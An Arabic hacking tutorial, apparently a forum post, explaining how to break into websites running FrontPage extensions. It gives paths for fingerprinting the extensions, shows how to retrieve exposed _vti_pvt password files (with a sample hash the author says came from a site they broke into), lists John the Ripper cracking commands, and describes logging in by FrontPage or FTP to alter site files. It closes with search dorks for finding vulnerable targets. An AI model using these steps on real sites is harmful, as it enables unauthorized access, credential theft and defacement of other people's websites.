طرق معرفة واختراق المواقع التي تدعم FrontPage

كثر منا يعلم ان هذه الثغرة خاصة بنظام// NT - Unix



1-وسف أقوم الآن بشرح طريقة لمعرفة هل هذه المواقع تدعم frontpage أم لا؟



بعدة طرق ولن أذكر إلا الأسهل:



- بالذهاب إلى موقع netcraft

http://www.netcraft.com/

وكتابة اسم الموقع وبعد البحث سوف يظهر

mod_frontpage/x

x=(رقم الإصدار الخاص بالفرونت بيج)

- عن طريق إضافة جملة

vti_inf.html_/

بعد عنوان الموقع لنفرض أن الموقع:http://www.almodammer.com/

نضيف الجملة ليصبح بهذه الطريقة

http://www.almodammer.com/_vti_inf.html

وبعدها اضغط Enter

وراح يطلعلك في أول الصفحة هذه الكلمة

Frontpage Configuration Information

أي قد تم تثبيت مجلدات وبرامج الفرونت بيج

- وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا

بإضافة

vti_cnf_/

بعد عنوان الموقع كهذا المثال:

http://www.almodammer.com/_vti_cnf

واضغط زر الفأرة الأيمن واختار

source المصدر

وابحث عن

vti_generator:Programe

حيث

Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به



--------------------------------------------------



2-ألحين وعرفنا الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟

بسيطة إنت هات الموقع الي يبدعم frontpage واعلمك

يعني وعلى سبيل المثال

http://www.almodammer.com/

يدعم fontpage طيب نذهب إلى ملف vti_pvt_

كذا يعني

http://www.almodammer.com/_vti_pvt

وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:

=============

Adminstrator.pwd

Adminstrators.pwd

Service.pwd

Users.pwd

User.pwd

Author.pwd

=============

ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود

username : passwd

اسم المستخدم والباسوورد

يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف service يحتوي على user / password

وهذا مضمون الملف

operator:hi9LHn9wAMuKM

حيث اسم المستخدم : operator

الباسوورد المشفرة هي:hi9LHn9wAMuKM



ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره

وهذا يتم ببرامج كثير

=(Crack Jack)=

=(John The Ripper)=



راح نستخدم الأفضل والأكثر تداولا وهو

John The Ripper

لتحميل البرنامج من هذا الموقع::

http://www.openwall.com/john



كيف تفك التشفير بهذا البرنامج



أول شي تروح تنقل البرنامج إلى مجلد

:c

بعدين تفتح مجلد RUN

وتسويلك مستند نصي txt وتسمي الملف passwd وتضع فيه كلمة السر الي تبي تفك تشفيرها

إذهب إلى

ابدأ start

تشغيل run

اكتب الأمر

command

اضغط على Enter وبعدها راح يفتح

إطار الـDoS

اذهب إلى مجلد RUN

وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم الأمر

..cd

حتى توصل

<:c

بعدين اكتب

cd john

اضغط على Enter

وراح يظهر لك بهذا الشكل

<c:john

واكتب

cd RUN

وبتدخل المجلد ليصبح بهذه الطريقة

<c:/john/RUN

ألحين نكتب أوامر برنامج John The Ripper

وهي

====

john -i:all passd.txt

--------------------------

يبحث لك عن جميع الأنواع والاحتمالات



====

john -i:Alpha passwd.txt

----------------------------------

يبحث عن الأحرف الصغيرة



====

john -i: Digits passwd.txt

----------------------------------

يبحث عن الأرقام



====

john -i:single passwd.txt

---------------------------------

أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم



--------------------------------------------------------------------------------

وبعد ماتجرب كل هذي الأوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ولا لأ إذهب إلى

john.pot

الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها

--------------------------------------------------------------------------------



إنت ألحين مستريح عندك username والـpassword

وش بقالك ؟!!

يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/





frontpage

بعدين

file وتذهب إلى

open web وتضيف

الاسم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك



من FTP

وعليك ببرامج الـFTP المنتشرة

كالـws-ftp

والـpro ftp

والمزيد ...

ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل لك وأضمن لك



======================================



وألحين أكيد تبون تجربون على موقع أقولكم روحوا google

http://www.google.com/

واكتبوا في إطار البحث

vti_pvt_/

وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة



وعندك محرك بحث

http://www.altavista.com/

تكتب في محرك البحث

link:service.pwd

أو..

link:adminstrators

وغيرها من الملفات الاحتمال وجود password فيها